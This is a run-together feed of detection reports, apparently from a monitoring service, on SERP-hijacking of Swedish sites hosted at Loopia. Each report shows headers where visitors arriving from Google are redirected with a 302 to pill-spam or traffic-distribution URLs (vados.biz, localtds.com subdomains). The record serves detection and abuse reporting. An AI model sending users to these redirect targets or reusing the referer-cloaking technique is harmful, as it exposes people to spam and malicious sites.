Säkrare hemsida med .sehttp://utt.se/ (194.9.95.100) - Serp-hijackingAttacked url: http://utt.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 21 Jun 2017 14:26:50 +0200<br><br>Visitors with referer are redirected to http://vados.biz/gosw?keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: utt.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Wed, 21 Jun 2017 12:26:50 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Link: &lt;http://utt.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: utt.se <br>Referer: http://www.google.com/search?q=utt.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Wed, 21 Jun 2017 12:26:49 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://vados.biz/gosw?keyword=&amp;pill=<br><br>utt.se is on 194.9.95.100<br>ASN for 194.9.95.100: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.95.100 corresponds with s7.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1498050422http://khal.se/ (194.9.94.137) - Serp-hijackingAttacked url: http://khal.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 21 Jun 2017 12:49:20 +0200<br><br>Visitors with referer are redirected to http://vados.biz/cialisse?keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: khal.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Wed, 21 Jun 2017 10:49:20 GMT <br>Content-Type: text/html; charset=utf-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Set-Cookie: c025e142ae5dd797a899add9154e4949=918l5gefh5p468j32ang3llbo5; path=/; HttpOnly <br>P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot; <br>Expires: Mon, 1 Jan 2001 00:00:00 GMT <br>Last-Modified: Wed, 21 Jun 2017 10:49:20 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: khal.se <br>Referer: http://www.google.com/search?q=khal.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Wed, 21 Jun 2017 10:49:19 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://vados.biz/cialisse?keyword=&amp;pill=<br><br>khal.se is on 194.9.94.137<br>ASN for 194.9.94.137: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.137 corresponds with s529.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1498050392http://ostacamping.se/ (194.9.95.65) - Serp-hijackingAttacked url: http://ostacamping.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 21 Jun 2017 11:46:51 +0200<br><br>Visitors with referer are redirected to http://vados.biz/gosw?keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: ostacamping.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Wed, 21 Jun 2017 09:46:51 GMT <br>Content-Type: text/html; charset=utf-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Set-Cookie: 72eaeff6113c9a3ed7fafc91f842c0d6=62ng78j036n1kmatf4fcnrua57; path=/; HttpOnly <br>P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot; <br>Expires: Mon, 1 Jan 2001 00:00:00 GMT <br>Last-Modified: Wed, 21 Jun 2017 09:46:50 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: ostacamping.se <br>Referer: http://www.google.com/search?q=ostacamping.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Wed, 21 Jun 2017 09:46:50 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://vados.biz/gosw?keyword=&amp;pill=<br><br>ostacamping.se is on 194.9.95.65<br>ASN for 194.9.95.65: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.95.65 corresponds with s210.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1498050351http://huggetsgross.se/ (194.9.94.73) - Serp-hijackingAttacked url: http://huggetsgross.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 21 Jun 2017 09:56:45 +0200<br><br>Visitors with referer are redirected to http://www.fapp.pw/app/se.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: huggetsgross.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 11006 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDQSQRDACQ=KBKAEGNAFGMGJEANILKFGOKN; path=/ <br>X-Powered-By: ASP.NET <br>Date: Wed, 21 Jun 2017 07:56:47 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: huggetsgross.se <br>Referer: http://www.google.com/search?q=huggetsgross.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 150 <br>Content-Type: text/html <br>Location: http://www.fapp.pw/app/se.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDQSQRDACQ=JBKAEGNAOLLNDPMGJHJHNNHH; path=/ <br>X-Powered-By: ASP.NET <br>Date: Wed, 21 Jun 2017 07:56:47 GMT <br>Connection: close<br><br>huggetsgross.se is on 194.9.94.73<br>ASN for 194.9.94.73: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.73 corresponds with iis10.windowscluster.loopia.se<br>Abuse.net does not have any reliable address for iis10.windowscluster.loopia.se<br>Found address in whois: abuse@loopia.se1498050317http://secon.se/ (194.9.94.102) - Serp-hijackingAttacked url: http://secon.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 21 Jun 2017 08:09:03 +0200<br><br>Visitors with referer are redirected to http://c2b1.localtds.com/?bxbTNJ&amp;keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: secon.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Wed, 21 Jun 2017 06:09:03 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>X-Pingback: http://secon.se/xmlrpc.php <br>Link: &lt;http://secon.se/?p=24&gt;; rel=shortlink <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: secon.se <br>Referer: http://www.google.com/search?q=secon.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Wed, 21 Jun 2017 06:09:00 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://c2b1.localtds.com/?bxbTNJ&amp;keyword=&amp;pill=<br><br>secon.se is on 194.9.94.102<br>ASN for 194.9.94.102: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.102 corresponds with s377.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1498050265http://kaffehornan.se/ (194.9.94.54) - Serp-hijackingAttacked url: http://kaffehornan.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 21 Jun 2017 07:48:53 +0200<br><br>Visitors with referer are redirected to http://vados.biz/gosw?keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: kaffehornan.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Wed, 21 Jun 2017 05:48:53 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Link: &lt;http://kaffehornan.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: kaffehornan.se <br>Referer: http://www.google.com/search?q=kaffehornan.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Wed, 21 Jun 2017 05:48:51 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://vados.biz/gosw?keyword=&amp;pill=<br><br>kaffehornan.se is on 194.9.94.54<br>ASN for 194.9.94.54: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.54 corresponds with s517.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1498050261http://umeatidningstransporter.se/ (194.9.95.100) - Serp-hijackingAttacked url: http://umeatidningstransporter.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 21 Jun 2017 01:42:26 +0200<br><br>Visitors with referer are redirected to http://vados.biz/gosw?keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: umeatidningstransporter.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 23:42:26 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Link: &lt;http://utt.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: umeatidningstransporter.se <br>Referer: http://www.google.com/search?q=umeatidningstransporter.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 23:42:25 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://vados.biz/gosw?keyword=&amp;pill=<br><br>umeatidningstransporter.se is on 194.9.95.100<br>ASN for 194.9.95.100: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.95.100 corresponds with s7.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1498050196http://ithu.se/ (194.9.94.15) - Serp-hijackingAttacked url: http://ithu.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 21 Jun 2017 01:02:16 +0200<br><br>Visitors with referer are redirected to http://04b962.localtds.com/?bxbTNJ&amp;keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: ithu.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 23:02:16 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://ny.ithu.se/ <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: ithu.se <br>Referer: http://www.google.com/search?q=ithu.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 23:02:15 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://04b962.localtds.com/?bxbTNJ&amp;keyword=&amp;pill=<br><br>ithu.se is on 194.9.94.15<br>ASN for 194.9.94.15: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.15 corresponds with s515.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1498050180http://davidlilja.se/ (194.9.95.75) - Serp-hijackingAttacked url: http://davidlilja.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 21 Jun 2017 00:52:59 +0200<br><br>Visitors with referer are redirected to http://vados.biz/gosw?keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: davidlilja.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 22:52:59 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Link: &lt;http://davidlilja.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br>Link: &lt;http://wp.me/P8xTbr-nK&gt;; rel=shortlink <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: davidlilja.se <br>Referer: http://www.google.com/search?q=davidlilja.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 22:52:57 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://vados.biz/gosw?keyword=&amp;pill=<br><br>davidlilja.se is on 194.9.95.75<br>ASN for 194.9.95.75: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.95.75 corresponds with s190.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1498050165http://mhs.se/ (194.9.94.228) - Serp-hijackingAttacked url: http://mhs.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 20 Jun 2017 22:46:35 +0200<br><br>Visitors with referer are redirected to http://36742.localtds.com/?bxbTNJ&amp;keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: mhs.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 20:46:35 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Link: &lt;http://mhs.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br>Link: &lt;http://mhs.se/&gt;; rel=shortlink <br>X-Frame-Options: SAMEORIGIN <br>X-XSS-Protection: 1; mode=block <br>X-Content-Type-Options: nosniff <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: mhs.se <br>Referer: http://www.google.com/search?q=mhs.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 20:46:32 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://36742.localtds.com/?bxbTNJ&amp;keyword=&amp;pill= <br>X-Frame-Options: SAMEORIGIN <br>X-XSS-Protection: 1; mode=block <br>X-Content-Type-Options: nosniff<br><br>mhs.se is on 194.9.94.228<br>ASN for 194.9.94.228: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.228 corresponds with s169.loopia.se<br>Abuse.net does not have any reliable address for s169.loopia.se<br>Found address in whois: abuse@loopia.se1498050060http://stadsmagasinet.se/ (194.9.95.119) - Serp-hijackingAttacked url: http://stadsmagasinet.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 20 Jun 2017 20:14:19 +0200<br><br>Visitors with referer are redirected to http://1e7.localtds.com/?bxbTNJ&amp;keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: stadsmagasinet.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 18:14:20 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Link: &lt;http://stadsmagasinet.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br>Link: &lt;http://stadsmagasinet.se/&gt;; rel=shortlink <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: stadsmagasinet.se <br>Referer: http://www.google.com/search?q=stadsmagasinet.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 18:14:19 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://1e7.localtds.com/?bxbTNJ&amp;keyword=&amp;pill=<br><br>stadsmagasinet.se is on 194.9.95.119<br>ASN for 194.9.95.119: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.95.119 corresponds with s298.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1498049973http://fangelset.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://fangelset.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 20 Jun 2017 18:05:28 +0200<br><br>Visitors with referer are redirected to http://vados.biz/gosw?keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: fangelset.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 16:05:29 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Set-Cookie: wfvt_1347251573=594947c954ea0; expires=Tue, 20-Jun-2017 16:35:29 GMT; Max-Age=1800; path=/; httponly <br>Link: &lt;http://fangelset.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br>Link: &lt;http://fangelset.se/&gt;; rel=shortlink <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: fangelset.se <br>Referer: http://www.google.com/search?q=fangelset.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 16:05:27 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://vados.biz/gosw?keyword=&amp;pill=<br><br>fangelset.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1498049954http://imrab.se/ (194.9.94.213) - Serp-hijackingAttacked url: http://imrab.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 20 Jun 2017 18:01:23 +0200<br><br>Visitors with referer are redirected to http://vados.biz/gosw?keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: imrab.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 16:01:23 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Set-Cookie: PHPSESSID=uaeifr4j8j1ulsnb46alnf2683; path=/ <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Link: &lt;http://imrab.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br>Link: &lt;http://imrab.se/&gt;; rel=shortlink <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: imrab.se <br>Referer: http://www.google.com/search?q=imrab.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 16:01:20 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://vados.biz/gosw?keyword=&amp;pill=<br><br>imrab.se is on 194.9.94.213<br>ASN for 194.9.94.213: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.213 corresponds with s368.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1498049951http://fangelset.se/arrangemang/ (194.9.94.194) - Serp-hijackingAttacked url: http://fangelset.se/arrangemang/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 20 Jun 2017 17:27:23 +0200<br><br>Visitors with referer are redirected to http://vados.biz/gosw?keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: fangelset.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 15:27:24 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Set-Cookie: wfvt_1347251573=59493edcb0b75; expires=Tue, 20-Jun-2017 15:57:24 GMT; Max-Age=1800; path=/; httponly <br>Link: &lt;http://fangelset.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br>Link: &lt;http://fangelset.se/&gt;; rel=shortlink <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: fangelset.se <br>Referer: http://www.google.com/search?q=fangelset.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 15:27:21 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://vados.biz/gosw?keyword=&amp;pill=<br><br>fangelset.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1498049913http://kylimportorerna.se/ (194.9.94.38) - Serp-hijackingAttacked url: http://kylimportorerna.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Sun, 18 Jun 2017 20:07:51 +0200<br><br>Visitors with referer are redirected to http://c5167.localtds.com/?bxbTNJ&amp;keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: kylimportorerna.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.10.3 <br>Date: Sun, 18 Jun 2017 18:07:51 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://www.kylimportorerna.se/ <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: kylimportorerna.se <br>Referer: http://www.google.com/search?q=kylimportorerna.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Sun, 18 Jun 2017 18:07:50 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://c5167.localtds.com/?bxbTNJ&amp;keyword=&amp;pill=<br><br>kylimportorerna.se is on 194.9.94.38<br>ASN for 194.9.94.38: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.38 corresponds with s439.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1497853491http://manspodden.se/ (194.9.94.15) - Serp-hijackingAttacked url: http://manspodden.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Sun, 18 Jun 2017 19:14:12 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: manspodden.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Sun, 18 Jun 2017 17:14:12 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Link: &lt;http://manspodden.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: manspodden.se <br>Referer: http://www.google.com/search?q=manspodden.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Sun, 18 Jun 2017 17:14:10 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Set-Cookie: redirectCookie=1; expires=Mon, 19-Jun-2017 17:14:10 GMT; Max-Age=86400 <br>Location: http://islas.co.uk/college/image/<br><br>manspodden.se is on 194.9.94.15<br>ASN for 194.9.94.15: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.15 corresponds with s515.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1497853481http://kylimportorerna.se/ (194.9.94.38) - Serp-hijackingAttacked url: http://kylimportorerna.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Fri, 16 Jun 2017 15:42:30 +0200<br><br>Visitors with referer are redirected to http://c5167.localtds.com/?bxbTNJ&amp;keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: kylimportorerna.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.10.3 <br>Date: Fri, 16 Jun 2017 13:42:30 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://www.kylimportorerna.se/ <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: kylimportorerna.se <br>Referer: http://www.google.com/search?q=kylimportorerna.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Fri, 16 Jun 2017 13:42:29 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://c5167.localtds.com/?bxbTNJ&amp;keyword=&amp;pill=<br><br>kylimportorerna.se is on 194.9.94.38<br>ASN for 194.9.94.38: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.38 corresponds with s439.loopia.se<br>Abuse.net has 1 reliable address(es) for 